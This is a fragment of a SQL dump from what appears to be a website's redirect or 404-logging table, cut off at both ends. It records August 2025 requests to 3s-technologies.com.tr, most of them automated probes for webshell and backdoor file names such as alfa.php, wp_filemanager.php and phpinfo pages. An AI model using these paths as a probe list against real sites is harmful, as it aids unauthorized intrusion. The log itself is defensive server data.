00:00:00',301),(44683,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/class.php',NULL,'','',1,0,'2025-08-12 20:26:33','0000-00-00 00:00:00',301),(44684,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/wp-configs.php',NULL,'','',1,0,'2025-08-12 20:26:34','0000-00-00 00:00:00',301),(44685,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/admin.php',NULL,'','',1,0,'2025-08-12 20:26:35','0000-00-00 00:00:00',301),(44686,'http://3s-technologies.com.tr/tr/wp-includes/assets/wp-trackback.php',NULL,'','',2,0,'2025-08-12 20:26:35','0000-00-00 00:00:00',301),(44687,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/jp.php',NULL,'','',1,0,'2025-08-12 20:26:36','0000-00-00 00:00:00',301),(44688,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/wp-mail.php',NULL,'','',1,0,'2025-08-12 20:26:37','0000-00-00 00:00:00',301),(44689,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/link.php',NULL,'','',1,0,'2025-08-12 20:26:38','0000-00-00 00:00:00',301),(44690,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/wp.php',NULL,'','',1,0,'2025-08-12 20:26:38','0000-00-00 00:00:00',301),(44691,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/media.php.infected.php',NULL,'','',1,0,'2025-08-12 20:26:40','0000-00-00 00:00:00',301),(44692,'http://3s-technologies.com.tr/tr/wp-includes/id3/link.php',NULL,'','',1,0,'2025-08-12 20:26:40','0000-00-00 00:00:00',301),(44693,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/wp-mail.php',NULL,'','',1,0,'2025-08-12 20:26:41','0000-00-00 00:00:00',301),(44694,'http://3s-technologies.com.tr/tr/js/wp-2019.php',NULL,'','',1,0,'2025-08-12 20:26:42','0000-00-00 00:00:00',301),(44695,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/ty.php',NULL,'','',1,0,'2025-08-12 20:26:42','0000-00-00 00:00:00',301),(44696,'http://3s-technologies.com.tr/tr/wp-admin/wp-configs.php',NULL,'','',1,0,'2025-08-12 20:26:43','0000-00-00 00:00:00',301),(44697,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/defaults.php',NULL,'','',1,0,'2025-08-12 20:26:44','0000-00-00 00:00:00',301),(44698,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/network.php',NULL,'','',1,0,'2025-08-12 20:26:44','0000-00-00 00:00:00',301),(44699,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/goat1.php',NULL,'','',1,0,'2025-08-12 20:26:45','0000-00-00 00:00:00',301),(44700,'http://3s-technologies.com.tr/tr/.well-known/getid3s.php',NULL,'','',1,0,'2025-08-12 20:26:46','0000-00-00 00:00:00',301),(44701,'http://3s-technologies.com.tr/tr/js/rk2.php',NULL,'','',1,0,'2025-08-12 20:26:47','0000-00-00 00:00:00',301),(44702,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/network.php',NULL,'','',1,0,'2025-08-12 20:26:48','0000-00-00 00:00:00',301),(44703,'http://3s-technologies.com.tr/tr/bolt.php',NULL,'','',188,0,'2025-08-12 21:39:59','0000-00-00 00:00:00',301),(44704,'http://3s-technologies.com.tr/tr/pepe.php',NULL,'','',29,0,'2025-08-12 21:39:59','0000-00-00 00:00:00',301),(44705,'http://3s-technologies.com.tr/tr/law.php',NULL,'','',27,0,'2025-08-12 21:40:01','0000-00-00 00:00:00',301),(44706,'http://3s-technologies.com.tr/tr/yca.php',NULL,'','',8,0,'2025-08-12 21:40:02','0000-00-00 00:00:00',301),(44707,'http://3s-technologies.com.tr/tr/wsad.php',NULL,'','',8,0,'2025-08-12 21:40:02','0000-00-00 00:00:00',301),(44708,'http://3s-technologies.com.tr/tr/ceo.php',NULL,'','',2,0,'2025-08-12 23:04:32','0000-00-00 00:00:00',301),(44709,'http://3s-technologies.com.tr/tr/fire.php',NULL,'','',1,0,'2025-08-12 23:04:33','0000-00-00 00:00:00',301),(44710,'http://3s-technologies.com.tr/tr/boom.php',NULL,'','',1,0,'2025-08-12 23:04:34','0000-00-00 00:00:00',301),(44711,'http://3s-technologies.com.tr/tr/2025.php',NULL,'','',1,0,'2025-08-12 23:04:35','0000-00-00 00:00:00',301),(44712,'http://3s-technologies.com.tr/tr/light.php',NULL,'','',1,0,'2025-08-12 23:04:37','0000-00-00 00:00:00',301),(44713,'http://3s-technologies.com.tr/tr/star.php',NULL,'','',5,0,'2025-08-12 23:04:41','0000-00-00 00:00:00',301),(44714,'http://3s-technologies.com.tr/tr/dd.php',NULL,'','',5,0,'2025-08-12 23:05:18','0000-00-00 00:00:00',301),(44715,'http://3s-technologies.com.tr/tr/hh.php',NULL,'','',11,0,'2025-08-12 23:05:19','0000-00-00 00:00:00',301),(44716,'http://3s-technologies.com.tr/tr/ii.php',NULL,'','',5,0,'2025-08-12 23:05:21','0000-00-00 00:00:00',301),(44717,'http://3s-technologies.com.tr/tr/jj.php',NULL,'','',7,0,'2025-08-12 23:05:22','0000-00-00 00:00:00',301),(44718,'http://3s-technologies.com.tr/tr/ll.php',NULL,'','',19,0,'2025-08-12 23:05:24','0000-00-00 00:00:00',301),(44719,'http://3s-technologies.com.tr/tr/qq.php',NULL,'','',2,0,'2025-08-12 23:05:28','0000-00-00 00:00:00',301),(44720,'http://3s-technologies.com.tr/tr/pp.php',NULL,'','',127,0,'2025-08-12 23:05:29','0000-00-00 00:00:00',301),(44721,'http://3s-technologies.com.tr/tr/rr.php',NULL,'','',2,0,'2025-08-12 23:05:30','0000-00-00 00:00:00',301),(44722,'http://3s-technologies.com.tr/tr/uu.php',NULL,'','',2,0,'2025-08-12 23:05:33','0000-00-00 00:00:00',301),(44723,'http://3s-technologies.com.tr/tr/b1.php',NULL,'','',1,0,'2025-08-12 23:05:37','0000-00-00 00:00:00',301),(44724,'http://3s-technologies.com.tr/tr/b2.php',NULL,'','',2,0,'2025-08-12 23:05:38','0000-00-00 00:00:00',301),(44725,'http://3s-technologies.com.tr/tr/b3.php',NULL,'','',1,0,'2025-08-12 23:05:39','0000-00-00 00:00:00',301),(44726,'http://3s-technologies.com.tr/tr/b4.php',NULL,'','',4,0,'2025-08-12 23:05:40','0000-00-00 00:00:00',301),(44727,'http://3s-technologies.com.tr/tr/b5.php',NULL,'','',1,0,'2025-08-12 23:05:41','0000-00-00 00:00:00',301),(44728,'http://3s-technologies.com.tr/tr/b6.php',NULL,'','',1,0,'2025-08-12 23:05:42','0000-00-00 00:00:00',301),(44729,'http://3s-technologies.com.tr/tr/b7.php',NULL,'','',1,0,'2025-08-12 23:05:43','0000-00-00 00:00:00',301),(44730,'http://3s-technologies.com.tr/tr/b8.php',NULL,'','',1,0,'2025-08-12 23:05:44','0000-00-00 00:00:00',301),(44731,'http://3s-technologies.com.tr/tr/b9.php',NULL,'','',1,0,'2025-08-12 23:05:45','0000-00-00 00:00:00',301),(44732,'http://3s-technologies.com.tr/tr/b10.php',NULL,'','',1,0,'2025-08-12 23:05:46','0000-00-00 00:00:00',301),(44733,'http://3s-technologies.com.tr/tr/c1.php',NULL,'','',21,0,'2025-08-12 23:05:47','0000-00-00 00:00:00',301),(44734,'http://3s-technologies.com.tr/tr/c2.php',NULL,'','',1,0,'2025-08-12 23:05:48','0000-00-00 00:00:00',301),(44735,'http://3s-technologies.com.tr/tr/c3.php',NULL,'','',1,0,'2025-08-12 23:05:49','0000-00-00 00:00:00',301),(44736,'http://3s-technologies.com.tr/tr/c4.php',NULL,'','',20,0,'2025-08-12 23:05:49','0000-00-00 00:00:00',301),(44737,'http://3s-technologies.com.tr/tr/c5.php',NULL,'','',1,0,'2025-08-12 23:05:50','0000-00-00 00:00:00',301),(44738,'http://3s-technologies.com.tr/tr/c6.php',NULL,'','',1,0,'2025-08-12 23:05:51','0000-00-00 00:00:00',301),(44739,'http://3s-technologies.com.tr/tr/c8.php',NULL,'','',1,0,'2025-08-12 23:05:53','0000-00-00 00:00:00',301),(44740,'http://3s-technologies.com.tr/tr/c9.php',NULL,'','',1,0,'2025-08-12 23:05:54','0000-00-00 00:00:00',301),(44741,'http://3s-technologies.com.tr/tr/c10.php',NULL,'','',2,0,'2025-08-12 23:05:55','0000-00-00 00:00:00',301),(44742,'http://3s-technologies.com.tr/tr/v1.php',NULL,'','',28,0,'2025-08-12 23:05:56','0000-00-00 00:00:00',301),(44743,'http://3s-technologies.com.tr/tr/v2.php',NULL,'','',78,0,'2025-08-12 23:05:57','0000-00-00 00:00:00',301),(44744,'http://3s-technologies.com.tr/tr/v6.php',NULL,'','',2,0,'2025-08-12 23:06:01','0000-00-00 00:00:00',301),(44745,'http://3s-technologies.com.tr/tr/v7.php',NULL,'','',2,0,'2025-08-12 23:06:01','0000-00-00 00:00:00',301),(44746,'http://3s-technologies.com.tr/tr/v8.pp',NULL,'','',1,0,'2025-08-12 23:06:02','0000-00-00 00:00:00',301),(44747,'http://3s-technologies.com.tr/tr/v9.php',NULL,'','',4,0,'2025-08-12 23:06:03','0000-00-00 00:00:00',301),(44748,'http://3s-technologies.com.tr/tr/v10.php',NULL,'','',2,0,'2025-08-12 23:06:04','0000-00-00 00:00:00',301),(44749,'http://3s-technologies.com.tr/tr/f1.php',NULL,'','',9,0,'2025-08-12 23:06:05','0000-00-00 00:00:00',301),(44750,'http://3s-technologies.com.tr/tr/f2.php',NULL,'','',9,0,'2025-08-12 23:06:06','0000-00-00 00:00:00',301),(44751,'http://3s-technologies.com.tr/tr/f3.php',NULL,'','',4,0,'2025-08-12 23:06:07','0000-00-00 00:00:00',301),(44752,'http://3s-technologies.com.tr/tr/f4.php',NULL,'','',2,0,'2025-08-12 23:06:08','0000-00-00 00:00:00',301),(44753,'http://3s-technologies.com.tr/tr/f6.php',NULL,'','',108,0,'2025-08-12 23:06:10','0000-00-00 00:00:00',301),(44754,'http://3s-technologies.com.tr/tr/f7.php',NULL,'','',2,0,'2025-08-12 23:06:11','0000-00-00 00:00:00',301),(44755,'http://3s-technologies.com.tr/tr/f8.php',NULL,'','',15,0,'2025-08-12 23:06:12','0000-00-00 00:00:00',301),(44756,'http://3s-technologies.com.tr/tr/f9.php',NULL,'','',2,0,'2025-08-12 23:06:13','0000-00-00 00:00:00',301),(44757,'http://3s-technologies.com.tr/tr/f10.php',NULL,'','',2,0,'2025-08-12 23:06:13','0000-00-00 00:00:00',301),(44758,'http://3s-technologies.com.tr/tr/a2.php',NULL,'','',149,0,'2025-08-12 23:06:15','0000-00-00 00:00:00',301),(44759,'http://3s-technologies.com.tr/tr/a3.php',NULL,'','',10,0,'2025-08-12 23:06:16','0000-00-00 00:00:00',301),(44760,'http://3s-technologies.com.tr/tr/a4.php',NULL,'','',69,0,'2025-08-12 23:06:17','0000-00-00 00:00:00',301),(44761,'http://3s-technologies.com.tr/tr/a5.php',NULL,'','',92,0,'2025-08-12 23:06:18','0000-00-00 00:00:00',301),(44762,'http://3s-technologies.com.tr/tr/a6.php',NULL,'','',9,0,'2025-08-12 23:06:19','0000-00-00 00:00:00',301),(44763,'http://3s-technologies.com.tr/tr/a7.php',NULL,'','',55,0,'2025-08-12 23:06:20','0000-00-00 00:00:00',301),(44764,'http://3s-technologies.com.tr/tr/a8.php',NULL,'','',9,0,'2025-08-12 23:06:21','0000-00-00 00:00:00',301),(44765,'http://3s-technologies.com.tr/tr/a9.php',NULL,'','',13,0,'2025-08-12 23:06:22','0000-00-00 00:00:00',301),(44766,'http://3s-technologies.com.tr/tr/a10.php',NULL,'','',3,0,'2025-08-12 23:06:23','0000-00-00 00:00:00',301),(44767,'http://3s-technologies.com.tr/tr/jobs.php',NULL,'','',1,0,'2025-08-12 23:06:25','0000-00-00 00:00:00',301),(44768,'http://3s-technologies.com.tr/tr/schemes.php',NULL,'','',1,0,'2025-08-12 23:06:27','0000-00-00 00:00:00',301),(44769,'http://3s-technologies.com.tr/tr/wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2025-08-13 02:55:34','0000-00-00 00:00:00',301),(44770,'http://3s-technologies.com.tr/tr/law2.php',NULL,'','',9,0,'2025-08-13 04:20:03','0000-00-00 00:00:00',301),(44771,'http://3s-technologies.com.tr/tr/law3.php',NULL,'','',2,0,'2025-08-13 04:20:04','0000-00-00 00:00:00',301),(44772,'http://3s-technologies.com.tr/tr/law4.php',NULL,'','',2,0,'2025-08-13 04:20:05','0000-00-00 00:00:00',301),(44773,'http://3s-technologies.com.tr/tr/law5.php',NULL,'','',2,0,'2025-08-13 04:20:06','0000-00-00 00:00:00',301),(44774,'http://3s-technologies.com.tr/tr/law6.php',NULL,'','',2,0,'2025-08-13 04:20:07','0000-00-00 00:00:00',301),(44775,'http://3s-technologies.com.tr/tr/law7.php',NULL,'','',2,0,'2025-08-13 04:20:08','0000-00-00 00:00:00',301),(44776,'http://3s-technologies.com.tr/tr/law8.php',NULL,'','',2,0,'2025-08-13 04:20:08','0000-00-00 00:00:00',301),(44777,'http://3s-technologies.com.tr/tr/law9.php',NULL,'','',2,0,'2025-08-13 04:20:09','0000-00-00 00:00:00',301),(44778,'http://3s-technologies.com.tr/tr/law10.php',NULL,'','',2,0,'2025-08-13 04:20:10','0000-00-00 00:00:00',301),(44779,'http://3s-technologies.com.tr/tr/function/yes.php',NULL,'','',2,0,'2025-08-13 05:43:13','0000-00-00 00:00:00',301),(44780,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/up /wp-content/plugins/seoplugins/wp-damin.php',NULL,'','',2,0,'2025-08-13 05:43:14','0000-00-00 00:00:00',301),(44781,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/hehe.php',NULL,'','',2,0,'2025-08-13 05:43:15','0000-00-00 00:00:00',301),(44782,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/yes.php',NULL,'','',2,0,'2025-08-13 05:43:16','0000-00-00 00:00:00',301),(44783,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/setup-config.php',NULL,'','',2,0,'2025-08-13 05:43:17','0000-00-00 00:00:00',301),(44784,'http://3s-technologies.com.tr/tr/wp-content/uploads/makeasmtp.php',NULL,'','',2,0,'2025-08-13 05:43:18','0000-00-00 00:00:00',301),(44785,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/xp.php',NULL,'','',2,0,'2025-08-13 05:43:18','0000-00-00 00:00:00',301),(44786,'http://3s-technologies.com.tr/tr/wp-includes/assets/rk2.php',NULL,'','',2,0,'2025-08-13 05:43:19','0000-00-00 00:00:00',301),(44787,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/jp.php',NULL,'','',2,0,'2025-08-13 05:43:20','0000-00-00 00:00:00',301),(44788,'http://3s-technologies.com.tr/tr/wp-includes/pomo/json.php',NULL,'','',2,0,'2025-08-13 05:43:21','0000-00-00 00:00:00',301),(44789,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/file.php',NULL,'','',2,0,'2025-08-13 05:43:22','0000-00-00 00:00:00',301),(44790,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/bless.php',NULL,'','',2,0,'2025-08-13 05:43:23','0000-00-00 00:00:00',301),(44791,'http://3s-technologies.com.tr/tr/wp-content/plugins/log.php',NULL,'','',2,0,'2025-08-13 05:43:24','0000-00-00 00:00:00',301),(44792,'http://3s-technologies.com.tr/tr/wp-content/themes/403.php',NULL,'','',2,0,'2025-08-13 05:43:25','0000-00-00 00:00:00',301),(44793,'http://3s-technologies.com.tr/tr/wp-content/plugins/google-seo-rank/cong.php',NULL,'','',2,0,'2025-08-13 05:43:28','0000-00-00 00:00:00',301),(44794,'http://3s-technologies.com.tr/tr/wp-includes/ixr/core.php /wp-includes/images/smilies/edit-tags.php',NULL,'','',2,0,'2025-08-13 05:43:30','0000-00-00 00:00:00',301),(44795,'http://3s-technologies.com.tr/tr/about/lock360.php',NULL,'','',2,0,'2025-08-13 05:43:31','0000-00-00 00:00:00',301),(44796,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/go.php',NULL,'','',2,0,'2025-08-13 05:43:32','0000-00-00 00:00:00',301),(44797,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/system_log.php',NULL,'','',2,0,'2025-08-13 05:43:33','0000-00-00 00:00:00',301),(44798,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/yes.php',NULL,'','',2,0,'2025-08-13 05:43:34','0000-00-00 00:00:00',301),(44799,'http://3s-technologies.com.tr/tr/update/packed.php',NULL,'','',2,0,'2025-08-13 05:43:35','0000-00-00 00:00:00',301),(44800,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/0x.php',NULL,'','',2,0,'2025-08-13 05:43:36','0000-00-00 00:00:00',301),(44801,'http://3s-technologies.com.tr/tr/wp-includes/blocks/themes.php',NULL,'','',2,0,'2025-08-13 05:43:37','0000-00-00 00:00:00',301),(44802,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/item.php',NULL,'','',2,0,'2025-08-13 05:43:38','0000-00-00 00:00:00',301),(44803,'http://3s-technologies.com.tr/tr/wp-admin/css/getid3s.php',NULL,'','',2,0,'2025-08-13 05:43:39','0000-00-00 00:00:00',301),(44804,'http://3s-technologies.com.tr/tr/wp-includes/wp-mail.php',NULL,'','',2,0,'2025-08-13 05:43:40','0000-00-00 00:00:00',301),(44805,'http://3s-technologies.com.tr/tr/wp-content/uploads/fucku.php',NULL,'','',2,0,'2025-08-13 05:43:41','0000-00-00 00:00:00',301),(44806,'http://3s-technologies.com.tr/tr/wp-admin/maint/wp.php',NULL,'','',2,0,'2025-08-13 05:43:41','0000-00-00 00:00:00',301),(44807,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/moon.php',NULL,'','',2,0,'2025-08-13 05:43:42','0000-00-00 00:00:00',301),(44808,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/core.php',NULL,'','',2,0,'2025-08-13 05:43:43','0000-00-00 00:00:00',301),(44809,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/cc.php',NULL,'','',2,0,'2025-08-13 05:43:44','0000-00-00 00:00:00',301),(44810,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/xp.php',NULL,'','',2,0,'2025-08-13 05:43:45','0000-00-00 00:00:00',301),(44811,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/network.php',NULL,'','',2,0,'2025-08-13 05:43:46','0000-00-00 00:00:00',301),(44812,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/ben.php',NULL,'','',2,0,'2025-08-13 05:43:47','0000-00-00 00:00:00',301),(44813,'http://3s-technologies.com.tr/tr/wp-content/themes/moon.php',NULL,'','',2,0,'2025-08-13 05:43:48','0000-00-00 00:00:00',301),(44814,'http://3s-technologies.com.tr/tr/wp-includes/html-api/readme.php',NULL,'','',2,0,'2025-08-13 05:43:49','0000-00-00 00:00:00',301),(44815,'http://3s-technologies.com.tr/tr/wp-admin/network/getid3s.php',NULL,'','',2,0,'2025-08-13 05:43:50','0000-00-00 00:00:00',301),(44816,'http://3s-technologies.com.tr/tr/wp-content/plugins/hellopress/moon.php',NULL,'','',2,0,'2025-08-13 05:43:51','0000-00-00 00:00:00',301),(44817,'http://3s-technologies.com.tr/tr/wp-includes/php-compat/as.php',NULL,'','',2,0,'2025-08-13 05:43:52','0000-00-00 00:00:00',301),(44818,'http://3s-technologies.com.tr/tr/wp-includes/widgets/fm.php',NULL,'','',2,0,'2025-08-13 05:43:53','0000-00-00 00:00:00',301),(44819,'http://3s-technologies.com.tr/tr/index/media.php',NULL,'','',2,0,'2025-08-13 05:43:53','0000-00-00 00:00:00',301),(44820,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/alfa.php',NULL,'','',2,0,'2025-08-13 05:43:54','0000-00-00 00:00:00',301),(44821,'http://3s-technologies.com.tr/tr/wp-includes/js/manager.php',NULL,'','',2,0,'2025-08-13 05:43:55','0000-00-00 00:00:00',301),(44822,'http://3s-technologies.com.tr/tr/admin/readme.php',NULL,'','',2,0,'2025-08-13 05:43:56','0000-00-00 00:00:00',301),(44823,'http://3s-technologies.com.tr/tr/wp-includes/f35.php',NULL,'','',2,0,'2025-08-13 05:43:57','0000-00-00 00:00:00',301),(44824,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/defaults.php',NULL,'','',2,0,'2025-08-13 05:43:59','0000-00-00 00:00:00',301),(44825,'http://3s-technologies.com.tr/tr/.well-known/up.php',NULL,'','',2,0,'2025-08-13 05:44:00','0000-00-00 00:00:00',301),(44826,'http://3s-technologies.com.tr/tr/admin/cc.php',NULL,'','',2,0,'2025-08-13 05:44:01','0000-00-00 00:00:00',301),(44827,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/xp.php',NULL,'','',2,0,'2025-08-13 05:44:02','0000-00-00 00:00:00',301),(44828,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/baxa1.php',NULL,'','',2,0,'2025-08-13 05:44:03','0000-00-00 00:00:00',301),(44829,'http://3s-technologies.com.tr/tr/xp.php /files/xmrlpc.php',NULL,'','',2,0,'2025-08-13 05:44:04','0000-00-00 00:00:00',301),(44830,'http://3s-technologies.com.tr/tr/wp-admin/css/as.php',NULL,'','',2,0,'2025-08-13 05:44:05','0000-00-00 00:00:00',301),(44831,'http://3s-technologies.com.tr/tr/wp-includes/html-api/wp.php',NULL,'','',2,0,'2025-08-13 05:44:06','0000-00-00 00:00:00',301),(44832,'http://3s-technologies.com.tr/tr/wp-admin/includes/ty.php',NULL,'','',2,0,'2025-08-13 05:44:06','0000-00-00 00:00:00',301),(44833,'http://3s-technologies.com.tr/tr/index/gecko-litespeed.php',NULL,'','',2,0,'2025-08-13 05:44:07','0000-00-00 00:00:00',301),(44834,'http://3s-technologies.com.tr/tr/file18.php',NULL,'','',71,0,'2025-08-13 07:53:55','0000-00-00 00:00:00',301),(44835,'http://3s-technologies.com.tr/tr/file14.php',NULL,'','',4,0,'2025-08-13 07:53:56','0000-00-00 00:00:00',301),(44836,'http://3s-technologies.com.tr/tr/file15.php',NULL,'','',55,0,'2025-08-13 07:53:57','0000-00-00 00:00:00',301),(44837,'http://3s-technologies.com.tr/tr/file19.php',NULL,'','',6,0,'2025-08-13 07:53:58','0000-00-00 00:00:00',301),(44838,'http://3s-technologies.com.tr/tr/file16.php',NULL,'','',3,0,'2025-08-13 07:53:59','0000-00-00 00:00:00',301),(44839,'http://3s-technologies.com.tr/tr/file17.php',NULL,'','',64,0,'2025-08-13 07:54:00','0000-00-00 00:00:00',301),(44840,'http://3s-technologies.com.tr/tr/file12.php',NULL,'','',6,0,'2025-08-13 07:54:02','0000-00-00 00:00:00',301),(44841,'http://3s-technologies.com.tr/tr/file11.php',NULL,'','',4,0,'2025-08-13 07:54:03','0000-00-00 00:00:00',301),(44842,'http://3s-technologies.com.tr/tr/file13.php',NULL,'','',16,0,'2025-08-13 07:54:04','0000-00-00 00:00:00',301),(44843,'https://3s-technologies.com.tr/tr/cdn-cgi/image/width=4000,format=auto/http:/images.ctfassets.net/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://3s-technologies.com.tr/cdn-cgi/image/width=4000,format=auto/http://images.ctfassets.net/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',3,0,'2025-08-13 13:26:26','0000-00-00 00:00:00',301),(44844,'http://3s-technologies.com.tr/tr/file21.php',NULL,'','',59,0,'2025-08-13 16:25:20','0000-00-00 00:00:00',301),(44845,'http://3s-technologies.com.tr/tr/file22.php',NULL,'','',21,0,'2025-08-13 16:25:21','0000-00-00 00:00:00',301),(44846,'http://3s-technologies.com.tr/tr/file23.php',NULL,'','',3,0,'2025-08-13 16:25:22','0000-00-00 00:00:00',301),(44847,'http://3s-technologies.com.tr/tr/file24.php',NULL,'','',4,0,'2025-08-13 16:25:23','0000-00-00 00:00:00',301),(44848,'http://3s-technologies.com.tr/tr/file25.php',NULL,'','',4,0,'2025-08-13 16:25:24','0000-00-00 00:00:00',301),(44849,'http://3s-technologies.com.tr/tr/file26.php',NULL,'','',3,0,'2025-08-13 16:25:25','0000-00-00 00:00:00',301),(44850,'http://3s-technologies.com.tr/tr/file27.php',NULL,'','',3,0,'2025-08-13 16:25:26','0000-00-00 00:00:00',301),(44851,'http://3s-technologies.com.tr/tr/file28.php',NULL,'','',3,0,'2025-08-13 16:25:27','0000-00-00 00:00:00',301),(44852,'http://3s-technologies.com.tr/tr/file29.php',NULL,'','',4,0,'2025-08-13 16:25:28','0000-00-00 00:00:00',301),(44853,'http://3s-technologies.com.tr/tr/file30.php',NULL,'','',20,0,'2025-08-13 16:25:29','0000-00-00 00:00:00',301),(44854,'http://www.3s-technologies.com.tr/en/joomla/images/urunler/showroom-may09.jpg',NULL,'','',1,0,'2025-08-13 23:20:34','0000-00-00 00:00:00',301),(44855,'http://3s-technologies.com.tr/tr/mail/backup/phpinfo.php',NULL,'','',2,0,'2025-08-14 21:41:35','0000-00-00 00:00:00',301),(44856,'http://3s-technologies.com.tr/tr/wp-content/uploads/gravity_forms/h/e/d/a/yjoxrfglsep.php',NULL,'','',1,0,'2025-08-14 21:41:36','0000-00-00 00:00:00',301),(44857,'http://3s-technologies.com.tr/tr/backend/info.php',NULL,'','',1,0,'2025-08-14 21:41:38','0000-00-00 00:00:00',301),(44858,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-econ/index.php',NULL,'','',1,0,'2025-08-14 21:41:39','0000-00-00 00:00:00',301),(44859,'https://3s-technologies.com.tr/tr/user:marisaorourke',NULL,'','',1,0,'2025-08-14 21:41:43','0000-00-00 00:00:00',301),(44860,'http://3s-technologies.com.tr/tr/dev/laravel/info.php',NULL,'','',1,0,'2025-08-14 21:41:44','0000-00-00 00:00:00',301),(44861,'http://3s-technologies.com.tr/tr/adm/php.php',NULL,'','',1,0,'2025-08-14 21:41:45','0000-00-00 00:00:00',301),(44862,'http://3s-technologies.com.tr/tr/portal/php-info.php',NULL,'','',1,0,'2025-08-14 21:41:46','0000-00-00 00:00:00',301),(44863,'http://3s-technologies.com.tr/tr/default/i.php',NULL,'','',3,0,'2025-08-14 21:41:47','0000-00-00 00:00:00',301),(44864,'http://3s-technologies.com.tr/tr/zabbix/index.php',NULL,'','',1,0,'2025-08-14 21:41:49','0000-00-00 00:00:00',301),(44865,'http://3s-technologies.com.tr/tr/laravel/app/database.php',NULL,'','',1,0,'2025-08-14 21:41:50','0000-00-00 00:00:00',301),(44866,'http://3s-technologies.com.tr/tr/var/www/includes/config.php',NULL,'','',1,0,'2025-08-14 21:41:50','0000-00-00 00:00:00',301),(44867,'http://3s-technologies.com.tr/tr/public/php-info.php',NULL,'','',1,0,'2025-08-14 21:41:53','0000-00-00 00:00:00',301),(44868,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/kart-ueretim-teknolojileri\n',NULL,'','',3,0,'2025-08-15 05:41:26','0000-00-00 00:00:00',301),(44869,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/aluminyum-işleme-aluminum-processing\n',NULL,'','',2,0,'2025-08-15 12:20:57','0000-00-00 00:00:00',301),(44870,'http://3s-technologies.com.tr/tr/wp-admin/js/webadmin.php',NULL,'','',1,0,'2025-08-15 17:22:49','0000-00-00 00:00:00',301),(44871,'http://3s-technologies.com.tr/tr/wp-content/uploads/media.php.infected.php',NULL,'','',1,0,'2025-08-15 17:22:50','0000-00-00 00:00:00',301),(44872,'http://3s-technologies.com.tr/tr/wp-includes/about.php7',NULL,'','',1,0,'2025-08-15 17:22:51','0000-00-00 00:00:00',301),(44873,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/db.php?u',NULL,'','',1,0,'2025-08-15 17:22:52','0000-00-00 00:00:00',301),(44874,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/wp_filemanager.php',NULL,'','',1,0,'2025-08-15 17:22:53','0000-00-00 00:00:00',301),(44875,'http://3s-technologies.com.tr/tr/wp-admin/css/doc.php',NULL,'','',1,0,'2025-08-15 17:22:54','0000-00-00 00:00:00',301),(44876,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp_filemanager.php',NULL,'','',1,0,'2025-08-15 17:22:56','0000-00-00 00:00:00',301),(44877,'http://3s-technologies.com.tr/tr/wp-admin/includes/403.php',NULL,'','',2,0,'2025-08-15 17:22:57','0000-00-00 00:00:00',301),(44878,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/manager.php',NULL,'','',1,0,'2025-08-15 17:22:58','0000-00-00 00:00:00',301),(44879,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/rk2.php',NULL,'','',2,0,'2025-08-15 17:22:59','0000-00-00 00:00:00',301),(44880,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/inputs.php',NULL,'','',1,0,'2025-08-15 17:23:01','0000-00-00 00:00:00',301),(44881,'http://3s-technologies.com.tr/tr/wp-includes/js/info.php',NULL,'','',1,0,'2025-08-15 17:23:02','0000-00-00 00:00:00',301),(44882,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/wp_filemanager.php',NULL,'','',1,0,'2025-08-15 17:23:03','0000-00-00 00:00:00',301),(44883,'http://3s-technologies.com.tr/tr/images/403.php',NULL,'','',1,0,'2025-08-15 17:23:04','0000-00-00 00:00:00',301),(44884,'http://3s-technologies.com.tr/tr/.well-known/media.php',NULL,'','',1,0,'2025-08-15 17:23:05','0000-00-00 